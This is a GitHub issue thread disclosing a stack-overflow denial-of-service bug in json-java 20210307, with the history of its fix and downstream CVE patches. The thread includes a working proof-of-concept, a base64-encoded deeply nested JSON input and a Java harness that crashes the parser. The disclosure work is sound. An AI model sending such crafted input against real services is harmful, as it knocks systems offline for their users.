Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

java.lang.StackOverflowError in org.json.JSONTokener.nextValue::JSONTokener.java:431 json-java 20210307 #654

Closed
ZanderHuang opened this issue Dec 13, 2021 · 9 comments · Fixed by #660
Closed

java.lang.StackOverflowError in org.json.JSONTokener.nextValue::JSONTokener.java:431 json-java 20210307 #654

ZanderHuang opened this issue Dec 13, 2021 · 9 comments · Fixed by #660

Comments

@ZanderHuang
Copy link

ZanderHuang commented Dec 13, 2021
edited
Loading

java.lang.StackOverflowError in org.json.JSONTokener.nextValue::JSONTokener.java:431 json-java 20210307

This vulnerability is of java.lang.StackOverflowError, and can be triggered in latest version json-java (20210307).
It is caused by triggering infinite recursive function calls under crafted user input file and can be used for attackers to launch DoS (Denial of Service) attack to exhaust the system resources for any java program that uses this library (CWE-121: Stack-based Buffer Overflow).

Likely, the root cause of this crash is in org.json.JSONTokener.nextValue::JSONTokener.java:431.
See more detail from the following crash stack.

Crash stack:

The crash thread's stack is as follows:

java.base/java.lang.StringUTF16.checkIndex::StringUTF16.java:1470
java.base/java.lang.StringUTF16.charAt::StringUTF16.java:1267
java.base/java.lang.String.charAt::String.java:695
java.base/java.io.StringReader.read::StringReader.java:72
org.json.JSONTokener.next::JSONTokener.java:199
org.json.JSONTokener.nextClean::JSONTokener.java:292
org.json.JSONObject.<init>::JSONObject.java:225
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431

Steps to reproduce:

  1. Build the following java code with the corresponding json-java library (version 20210307).
## Download java-json_env_reproduce.zip from https://drive.google.com/file/d/1c0Zw2YWrOeZ08T49hmxnfh2FiNNDAImN/view?usp=sharing
unzip java-json_env_reproduce.zip
cd java-json_env_reproduce
bash build.sh
  1. Run the built program to see the crash by feeding one of the poc file contained in the pocs.tar.gz
    (poc file and report can be downloaded from https://drive.google.com/drive/folders/1J3HBq-qGi1YxfwVTCS9y5rgelqgkhUQB?usp=sharing)
    e.g. :
java -jar target/Entry-1.0-SNAPSHOT-jar-with-dependencies.jar pocs/crash-a8aa8af68cf0c2e0853dfb9b0ad97f30a09a22d6

Any further discussion for this vulnerability including fix is welcomed!
Feel free to contact us at:
Huang Wenjie
Zhang Cen
Zhang Xiaohan
@johnjaylward
Copy link
Contributor

Please include any POC code in the issue and not as a separate download.

@johnjaylward
Copy link
Contributor

Also, do not send in zip files. Send uncompressed files only

@ZanderHuang
Copy link
Author

ZanderHuang commented Dec 13, 2021
edited
Loading

@johnjaylward The test program is as follows:

package com.test;

import java.io.IOException;

import java.nio.file.Files;
import java.nio.file.Paths;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;

import org.json.JSONObject;
import org.json.JSONException;

public class Entry {

        private static String readFile(String path, Charset encoding) {
                try {

                        byte[] encoded = Files.readAllBytes(Paths.get(path));
                        return new String(encoded, encoding);

                } catch (IOException e) {

                        System.out.println("read file content error: " + e);
                        System.exit(1);
                        return "";

                }
        }

        public static void main(String[] args) {
                assert args.length == 1;

                String content = readFile(args[0], StandardCharsets.UTF_8);

                System.out.println("begin test");

                try {
                        JSONObject json_input = new JSONObject(content);
                        json_input.toString();

                } catch (JSONException ignored) {
                }

                System.out.println("end test, no crash");
        }
}

The poc file is in binary so I cannot just simply paste it here.
You can download the single file from the link below:
https://drive.google.com/file/d/1Q45fXzDOWMqIAhNyaLKyoKDaNePi5THz/view?usp=sharing

@johnjaylward
Copy link
Contributor

Sorry, I'm not interested in downloading random binary files. If you can make a simple test input as a text file, that would be best.

@stleary
Copy link
Owner

stleary commented Dec 31, 2021

Closed due to lack of response.

@stleary stleary closed this as completed Dec 31, 2021
@Han0nly
Copy link

Han0nly commented Jan 26, 2022

Hi @stleary, I'm the collaborator of @ZanderHuang. Sorry for the late reply. Here is the POC code which makes the test input as a base64 text. Can you reopen this issue? Thank you!

	public static void main(String[] args) {
		String base64Bytes ="eyJHWiI6Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7ewl7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMCkwLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7CXt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7ewl7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMCkwLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7CXt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3sJe3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTApMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7ewl7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3sJe3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTApMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMCkwLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7CXt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7ewl7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMCkwLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7CXt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3sJe3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTApMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7ewl7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3sJe3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTApMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7ewl7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7c3t7e3t7e3vPAAAAAAAAAHt7e3t7e3t7e3t7e3t7e3t7e3t7e1ste3t7e3t7e3t7e3t7e3t7e3t7e3t7CXt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3tbLTAtMCx7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e1stMC0wLHt7e3t7e3t7e3t7e3t7e3t7e88AAAAAAAAAe3t7e3t7e3t7e3t7e3t7e3t7e3t7Wy0wLTAse3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7f3syMv//e3t7e3t7e3t7e3t7e3sx//////8=";
		String input = new String(java.util.Base64.getDecoder().decode(base64Bytes));
		try {
			JSONObject json_input = new JSONObject(input);
			String str = json_input.toString();
			System.out.println("The string is"+str);
		} catch (JSONException ignored) {
		}
	}

@johnjaylward
Copy link
Contributor

Thank you for the test input. I'll take a look at this.

@johnjaylward johnjaylward mentioned this issue Jan 26, 2022
Merged
@stleary stleary reopened this Jan 26, 2022
@stleary
Copy link
Owner

stleary commented Jan 26, 2022

Re-opened

@Han0nly
Copy link

Han0nly commented Jan 27, 2022

Hi @johnjaylward , are you willing to help us to request a CVE ID through GitHub Security Advisories for this bug, which can cause Denial of Service. You can follow this tutorial to use it to manage your bug fixes and alert any downstream dependencies of the issue so they can patch immediately if using the broken release. Thanks for your help!

stleary added a commit that referenced this issue Jan 31, 2022
@stleary
Merge pull request #660 from johnjaylward/Issue654StackOverflowError
c33ad9c 
Wrap StackOverflow with JSONException to fix Issue #654
@dushaniw dushaniw mentioned this issue Mar 25, 2022
Closed
erosb pushed a commit to hazelcast/hazelcast that referenced this issue Apr 1, 2022
Bumps json schema validator to 1.14.1 (#21116)
45d0f80 
Xray found a vulnerability on json and was fixed on version 20220320. Please refer to the following links:
stleary/JSON-java#654
stleary/JSON-java#660

The new validator library depends on the fixed org.json version: https://github.com/everit-org/json-schema/releases/tag/1.14.1

Source: slack: https://hazelcast.slack.com/archives/G01LH0K3VK8/p1648714007131469
@wfhartford wfhartford mentioned this issue Apr 22, 2022
Closed
@looly looly mentioned this issue Nov 29, 2022
Closed
CheesyGamer77 added a commit to CheesyGamer77/discord-webhooks that referenced this issue Jan 7, 2023
@CheesyGamer77
Bump org.json dependency
5b713ee 
Addresses CVE

Refs: stleary/JSON-java#654
This was referenced Mar 13, 2023
Open
Open
This was referenced Mar 14, 2023
Open
Open
This was referenced Dec 21, 2022
Closed
Closed
This was referenced Feb 7, 2023
Open
Open
@eamonnmcmanus eamonnmcmanus mentioned this issue Sep 20, 2023
Closed
This was referenced Jun 23, 2023
Closed
Closed
Closed
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Wrap StackOverflow with JSONException johnjaylward/JSON-java
4 participants
@johnjaylward @stleary @Han0nly @ZanderHuang